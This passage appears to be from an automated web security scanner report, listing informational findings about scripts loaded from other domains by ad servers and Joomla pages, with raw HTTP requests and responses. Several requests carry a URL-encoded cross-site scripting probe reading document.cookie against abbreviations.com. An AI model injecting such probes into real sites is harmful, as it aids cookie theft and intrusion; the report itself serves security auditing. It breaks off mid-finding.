Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: powersportsnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:48:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Pragma: no-store
Content-Length: 39242
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Cache-control: Private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Motorcycle and ATV reviews, specifications, prices, used motorcycles by PowerSports Network</TITLE><META name="desc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.315. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The response dynamically includes the following script from another domain:
  • http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=5764026402?

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Comscore: CMXID=2115.924994.772178.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 21:08:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 21:08:40 GMT
Connection: close
Set-Cookie: A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; expires=Mon, 21-Feb-2011 21:08:40 GMT; path=/; domain=r1-ads.ace.advertising.com
Set-Cookie: F1=Bkl690kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 21:08:41 GMT; path=/
Set-Cookie: BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJl2JpJh5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; domain=advertising.com; expires=Wed, 23-Jan-2013 21:08:41 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzqEXE!; domain=advertising.com; expires=Wed, 23-Jan-2013 21:08:41 GMT; path=/
Set-Cookie: 49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; domain=advertising.com; path=/click
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=5764026402?">');document.write('<\/SCRIPT>
...[SNIP]...

21.316. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The response dynamically includes the following script from another domain:
  • http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3df724,5208681003,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=5208681003?

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924994.772178.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 22:03:16 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584
Date: Mon, 24 Jan 2011 22:03:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=kcfPNJpwIg02F1GCdbdRthgohXUbwOoAM/ohQK7YDwAoGg7r1VQcKagnGKGBI9YhXP53FkL3F75gPbw6TVswsu2B/0mRQea7IIaWG1G; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: F1=BQy990kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHCXD!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzquWE!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: 49004778=_4d3df724,5208681003,772178^924994^87^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3df724,5208681003,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=5208681003?">');document.write('<\/SCRIPT>
...[SNIP]...

21.317. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The response dynamically includes the following script from another domain:
  • http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3e3e58,2634220834,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=2634220834?

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=CT-1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 03:07:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924994.772178.0XMC
Set-Cookie: C2=Y5jPNJpwIg02F4FCdbdBehgohXgXwOoAM/oRBK7YDwAoGj6r1VQcKasjGKGBI9YRIP53FkL3F+4gPbw6TV4ssu2B/0mBBea7IIaWG4F; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:04 GMT; path=/
Set-Cookie: F1=BglP+0kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:04 GMT; path=/
Set-Cookie: BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHZpA!; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:04 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzq1oH!; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:04 GMT; path=/
Set-Cookie: 49004778=_4d3e3e58,2634220834,772178^924994^87^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 25 Jan 2011 03:07:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3e3e58,2634220834,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=2634220834?">');document.write('<\/SCRIPT>
...[SNIP]...

21.318. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The response dynamically includes the following script from another domain:
  • http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3e3e56,8624420504,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=8624420504?

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 03:07:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924994.772178.0XMC
Set-Cookie: C2=W5jPNJpwIg02F4FCdbdBehgohXgXwOoAM/oRBK7YDwAoGj6r1VQcKasjGKGBI9YRIP53FkL3F+4gPbw6TV4ssu2B/0mBBea7IIaWG4F; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:02 GMT; path=/
Set-Cookie: F1=BYlP+0kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:02 GMT; path=/
Set-Cookie: BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHZpA!; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:02 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzq1oH!; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:02 GMT; path=/
Set-Cookie: 49004778=_4d3e3e56,8624420504,772178^924994^87^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 25 Jan 2011 03:07:02 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3e3e56,8624420504,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=8624420504?">');document.write('<\/SCRIPT>
...[SNIP]...

21.319. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The response dynamically includes the following script from another domain:
  • http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3df728,7545040742,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=7545040742?

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Comscore: CMXID=2115.924994.772178.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 22:03:20 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 22:03:20 GMT
Connection: close
Set-Cookie: A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; expires=Mon, 21-Feb-2011 22:03:20 GMT; path=/; domain=r1-ads.ace.advertising.com
Set-Cookie: C2=ocfPNJpwIg02F1GCdbdRthgohXUbwOoAM/ohQK7YDwAoGg7r1VQcKagnGKGBI9YhXP53FkL3F75gPbw6TVswsu2B/0mRQea7IIaWG1G; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: F1=Bgy990kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHCXD!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzquWE!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: 49004778=_4d3df728,7545040742,772178^924994^87^0,0_; domain=advertising.com; path=/click
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3df728,7545040742,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=7545040742?">');document.write('<\/SCRIPT>
...[SNIP]...

21.320. http://resources.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET / HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=73c091fa2712ba7bf2c2185c73695000; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.321. http://resources.joomla.org/directory/advsearch.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /directory/advsearch.html

Issue detail

The response dynamically includes the following script from another domain:
